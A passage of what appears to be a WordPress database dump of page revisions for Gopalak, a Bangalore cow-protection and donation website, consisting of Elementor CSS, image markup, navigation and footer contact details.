.elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:07:35','2022-10-28 06:37:35','',1373,'https://gopalak.in/?p=2014',0,'revision','',0),(2015,1,'2022-10-28 12:07:35','2022-10-28 06:37:35','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:07:35','2022-10-28 06:37:35','',1373,'https://gopalak.in/?p=2015',0,'revision','',0),(2016,1,'2022-10-28 12:07:35','2022-10-28 06:37:35','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img 